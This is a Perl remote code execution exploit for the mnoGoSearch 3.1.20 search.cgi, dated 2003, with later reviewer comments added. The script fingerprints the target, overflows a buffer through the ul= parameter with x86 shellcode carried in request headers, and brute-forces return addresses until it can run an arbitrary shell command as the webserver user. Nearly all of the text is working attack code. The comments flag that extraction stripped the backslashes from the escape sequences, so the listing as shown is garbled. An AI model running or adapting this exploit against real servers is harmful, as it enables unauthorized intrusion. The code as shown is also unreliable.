
# Title : mnoGoSearch 3.1.20 Remote Command Execution Exploit
# Published : 2003-06-10
# Author : pokleyzz


#!/usr/bin/perl
# 
# [ reloaded ] 
# Remote Exploit for mnoGoSearch 3.1.20 that performs
# remote command execution as the webserver user id
# for linux ix86
# by pokleyzz
#

use IO::Socket;

# ---- defaults and command-line parsing ----
# Every variable below except $conn is a package global (the script does
# not enable strict) and is read directly by the subs further down.
$host = "127.0.0.1";
$cmd  = "ls -la";                      # interpolated verbatim into the payload by exploit()
$searchpath = "/cgi-bin/search.cgi";   # interpolated into the request line as-is
# First candidate return address for the sweep in the main loop; the usage
# text below advertises a different default (bfffd0d0) than this value.
$rawret = 0xbfff105c;
$ret = "";                             # packed address bytes, (re)set by string_to_ret()
$suffsize = 0;                         # extra leading padding for the ul= parameter
$port = 80;

my $conn;   # socket handle; connect_to() opens it, callers close it

# Positional arguments: host [command] [path] [port] [suff] [ret].
# Only the host is mandatory; any false-y argument (e.g. "0") is ignored
# and the default above is kept.
if ($ARGV[0]){
	$host = $ARGV[0];	
}
else {
	# NOTE(review): the stray "n"/"t" at the ends of these strings are the
	# remains of "\n"/"\t" escapes whose backslashes were lost when this
	# listing was extracted; the output is garbled as shown here.
	print "[x] mnogosearch 3.1.x exploit for linux ix86 ntby pokleyzznn";
	print "Usage:n mencari_sebuah_nama.pl host [command] [path] [port] [suff] [ret]n";
	print "thostthostname to exploitn";
	print "tcommandtcommand to execute on servern";
	print "tpathtpath to search.cgi default /cgi-bin/search.cgin";
	print "tporttport to connect ton";
	print "tsufftif not success try to use 1, 2 or 3 for suff (default is 0)n";
	print "trettreturn address default bfffd0d0n";
	exit;
}

if ($ARGV[1]){
	$cmd = $ARGV[1];	
}
if ($ARGV[2]){
	$searchpath = $ARGV[2];	
}
# port and suff are truncated with int() but never range-checked
if ($ARGV[3]){
	$port = int($ARGV[3]);	
}
if ($ARGV[4]){
	$suffsize = int($ARGV[4]);	
}	
# ret is expected as 8 bare hex digits (no "0x"); see hex_to_int()
if ($ARGV[5]){
	$rawret = hex_to_int($ARGV[5]);	
}

#########~~ start function ~~#########
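# Parse a string of 8 hex digits (e.g. "bfff105c", no "0x" prefix) into
# the integer it denotes, two digits per byte, most significant byte first.
# Digits past the eighth are ignored; a shorter string is effectively
# right-padded with zero bytes (hex('') is 0).  Returns the integer.
#
# The original assigned to an undeclared package global ($int) and relied
# on an implicit return; this version keeps the arithmetic but uses a
# lexical and an explicit return.
sub hex_to_int {
	my ($hs) = @_;
	my $value = 0;
	for my $offset (0, 2, 4, 6) {
		# shift the bytes parsed so far up one byte and append the next pair
		$value = ($value << 8) + hex(substr($hs, $offset, 2));
	}
	return $value;
}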

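# Format an integer as lower-case hex without prefix or zero padding,
# e.g. 0xbfff105c -> "bfff105c", 255 -> "ff".
#
# Note that no padding is applied: a value below 0x10000000 yields fewer
# than 8 characters, which string_to_ret() rejects.  The original stored
# the result in an undeclared package global ($hex) with an implicit
# return; behaviour of the returned value is unchanged.
sub int_to_hex {
	my ($in) = @_;
	return sprintf '%x', $in;
}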

# Turn the 8-character hex string from int_to_hex() into 4 raw bytes.
# The digit pairs are emitted in the order 2-3, 0-1, 6-7, 4-5, i.e. the
# two bytes of each 16-bit half are swapped.  The result is also stored in
# the package global $ret.  Anything other than exactly 8 characters is
# echoed and then aborts the script.
sub string_to_ret {
	my ($hexaddr) = @_;

	if (length($hexaddr) != 8) {
		print $hexaddr;
		die "[*] incorrect return address ...n ";
	}

	my @pieces = map { chr(hex(substr($hexaddr, $_, 2))) } (2, 0, 6, 4);
	$ret = join '', @pieces;
	return $ret;
}

# Open a TCP connection to the global $host:$port and store the handle in
# the file-scoped $conn (replacing any previous handle; callers close it
# themselves).  Aborts the script when the connection cannot be made.
# Ignores its arguments, so the ampersand call in exploit() is harmless.
sub connect_to {
	#print "[x] Connect to $host on port $port ...n";
	$conn = IO::Socket::INET->new (
					Proto => "tcp",
					PeerAddr => "$host",
					PeerPort => "$port",
					) or die "[*] Can't connect to $host on port $port ...n";
	$conn-> autoflush(1);   # flush each print immediately
}

# Fingerprint probe: one GET to $searchpath with tmplt=/test/testing123,
# reading the raw response until the server closes.  The marker "_test_"
# anywhere in the response is taken as "right version, possibly
# vulnerable"; otherwise the response is dumped and the script aborts.
# From the defender's side this probe is itself a useful log signature:
# a request whose tmplt parameter names an absolute path.
# NOTE(review): the "n" in the strings below are "\n" escapes whose
# backslashes were lost in extraction, so the request as shown is not
# a well-formed HTTP request.
sub check_version {
	my $result;
	connect_to();
	print "[x] Check if $host use correct version ...n";
	print $conn "GET $searchpath?tmplt=/test/testing123 HTTP/1.1nHost: $hostnConnection: Closenn"; 
	
	# capture result ($line is a package global, there is no "my")
	while ($line = <$conn>) { 
		$result .= $line;
		};
	
	close $conn;
	if ($result =~ /_test_/){
		print "[x] Correct version detected .. possibly vulnerable ...n";
	} else {
		print $result;
		die "[x] New version or wrong urln";
	}	
}

# Build and send one request for the candidate return address $rw, and
# collect the whole response into the package global $result for
# check_result().  Everything this sub touches except $rw is a package
# global ($shellcode, $strret, $ret, $envvar, $buffer, $request, $line).
#
# NOTE(review): this listing is not runnable as shown.  The backslashes of
# the "\x.." escapes in the byte string and of every "\n" were lost when
# the page was extracted, so e.g. "xeb" is just three letters and
# "$envvarn"/"$hostn" read as different variable names.
sub exploit {
	my $rw = $_[0];
	$result = "";
	# linux ix86 shellcode rip from phx.c by proton
	$shellcode = "xebx3bx5ex8dx5ex10x89x1ex8dx7ex18x89x7ex04x8dx7ex1bx89x7ex08"
	             ."xb8x40x40x40x40x47x8ax07x28xe0x75xf9x31xc0x88x07x89x46x0cx88"
	             ."x46x17x88x46x1ax89xf1x8dx56x0cxb0x0bxcdx80x31xdbx89xd8x40xcd"
	             ."x80xe8xc0xffxffxffx41x41x41x41x41x41x41x41x41x41x41x41x41x41"
	             ."x41x41"
	             # the command string: first emits a "Content-Type: text/hello"
	             # header and a blank line so that $cmd's output comes back as
	             # the HTTP body; "text/hello" is the marker check_result() keys
	             # on, and is distinct from the server's normal text/html
	             ."/bin/sh -c echo 'Content-Type: text/hello';echo '';"
	             ."$cmd"
	             ."@";
	$strret = int_to_hex($rw);
	$ret = string_to_ret($strret);
	# exactly 4096 bytes: 'B' padding followed by the payload; carried in
	# three request headers below (presumably because a CGI sees headers as
	# HTTP_* environment variables -- not shown here)
	$envvar = 'B' x (4096 - length($shellcode));
	$envvar .= $shellcode;
	
	# generate query string: $suffsize + 4800 filler bytes, then 200 copies
	# of the 4-byte address.  One request with a ~5.6 KB ul= parameter and
	# three 4 KB Accept* headers is the observable signature of this tool.
	$buffer = "B" x $suffsize;
	$buffer .= "B" x 4800;
	$buffer .= $ret x 200;
	
	$request = "GET $searchpath?ul=$buffer HTTP/1.1n"
		   ."Accept: $envvarn"
		   ."Accept-Language: $envvarn"
		   ."Accept-Encoding: $envvarn"
		   ."User-Agent: Mozilla/4.0n"
		   ."Host: $hostn"
		   ."Connection: Closenn";
	
	# ampersand call passes this sub's @_ along; connect_to() ignores it
	&connect_to;
	print "[x] Sending exploit code ..n";
	print "[x] ret: $strretn";
	print "[x] suf: $suffsizen";
	print "[x] length:",length($request),"n";
	print $conn "$request";
	# read until the server closes the connection
	while ($line = <$conn>) { 
		$result .= $line;
		};
	close $conn;
	
}

# Classify the last response in the package global $result: success when
# it contains "hello" and does not contain "text/html", i.e. the marker
# header from exploit() came back instead of the server's usual content
# type.  The response is printed either way; the verdict goes into the
# package global $success (1 or 0) for the main loop.
# NOTE(review): the inner "/" of "text/html" needs escaping (or another
# delimiter) inside m//; the backslash appears to have been lost in
# extraction, so the pattern as shown does not parse as intended.
sub check_result {
	if ($result =~ /hello/ && !($result =~ /text/html/)){
		print $result;
		$success = 1;
	} else {
		print $result;
		print "[*] Failed ...n";
		$success = 0;
	}
}
#########~~ end function ~~#########

# Main driver: verify the target first, then walk the candidate address
# upward in 1 KiB steps, one request per second, stopping as soon as
# check_result() sets $success.  Nothing is printed when the sweep runs out.
check_version();
while ($rawret < 0xbfffffff) {
	exploit($rawret);
	check_result();
	exit if $success == 1;
	sleep 1;
	$rawret += 1024;
}
